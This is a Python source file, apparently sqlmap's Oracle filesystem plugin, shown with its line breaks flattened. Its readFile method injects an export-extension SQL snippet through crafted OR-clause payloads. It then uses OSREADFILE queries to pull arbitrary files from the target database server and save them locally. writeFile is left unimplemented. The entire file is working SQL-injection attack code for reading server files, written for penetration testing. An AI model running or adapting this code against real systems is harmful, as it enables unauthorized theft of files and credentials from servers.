#!/usr/bin/env python """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ from lib.core.agent import agent from lib.core.common import dataToOutFile from lib.core.common import decodeDbmsHexValue from lib.core.common import getSQLSnippet from lib.core.data import kb from lib.core.data import logger from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject from lib.request.connect import Connect as Request from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): def readFile(self, remoteFile): localFilePaths = [] snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension") for query in snippet.split("\n"): query = query.strip() query = agent.prefixQuery("OR (%s) IS NULL" % query) query = agent.suffixQuery(query, trimEmpty=False) payload = agent.payload(newValue=query) Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) for remoteFile in remoteFile.split(','): infoMsg = "fetching file: '%s'" % remoteFile logger.info(infoMsg) kb.fileReadMode = True fileContent = inject.getValue("SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL) kb.fileReadMode = False if fileContent is not None: fileContent = decodeDbmsHexValue(fileContent, True) if fileContent: localFilePath = dataToOutFile(remoteFile, fileContent) localFilePaths.append(localFilePath) else: errMsg = "no data retrieved" logger.error(errMsg) return localFilePaths def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "File system write access not yet implemented for " errMsg += "Oracle" raise SqlmapUnsupportedFeatureException(errMsg)